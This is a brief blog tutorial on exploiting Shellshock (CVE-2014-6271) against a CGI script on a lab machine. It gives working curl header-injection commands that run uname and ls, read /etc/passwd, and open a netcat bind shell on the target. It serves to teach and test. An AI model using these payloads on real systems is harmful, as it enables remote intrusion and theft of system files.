CVE-2014-6271 – Shellshock

Written by  on June 24, 2015 

I found that vulnerability really interesting as it’s very simple to find and exploit, we can actually find it on several boxes on the net.

First of all we can use dirbus or some other tool to see if that the remote server is runing a CGI, when we call a CGI on an apache server, the remote server will start a new process and then will run the CGI script, apache uses local environment variables to send the parameters(headers) to the CGI. We’ll edit that headers to inject code by declaring and empty function as a bash environment variable( () { :; }; ) then we’ll add our evil command that will be ran.

CGI found on the box via dirbus, and also a valid file “status”

dirb

Now we can use curl, netcat or some proxy to exploit the shellshock vuln and run a command.

 curl -v  192.168.11.7/cgi-bin/status -H “custom:() { ignored; }; echo Content-Type: text/html; echo; /bin/uname -a”

uname

We can follow the same steps to run other commadns like ls and browse to the machine file system.

 curl -v  192.168.11.7/cgi-bin/status -H “custom:() { ignored; }; echo Content-Type: text/html; echo; /bin/ls -la /”

lsla

We also can use the cat command to read interesting files like /etc/passwd

 curl -v  192.168.11.7/cgi-bin/status -H “custom:() { ignored; }; echo Content-Type: text/html; echo; /bin/cat /etc/passwd

etcpasswd

And the fun stuff, we can use linux boxe’s native software like netcat to get a shell on the remote server.

echo -e “HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n” | nc 192.168.11.7 80

bindshell

A valid ISO for testing this vuln can be found at: https://ptl.io/cve-2014-6271.iso

More detailed information about the shellshock vuln can be found at: http://seclists.org/oss-sec/2014/q3/650

Category : interesting stuff

Tags :

Leave a Reply

Your email address will not be published. Required fields are marked *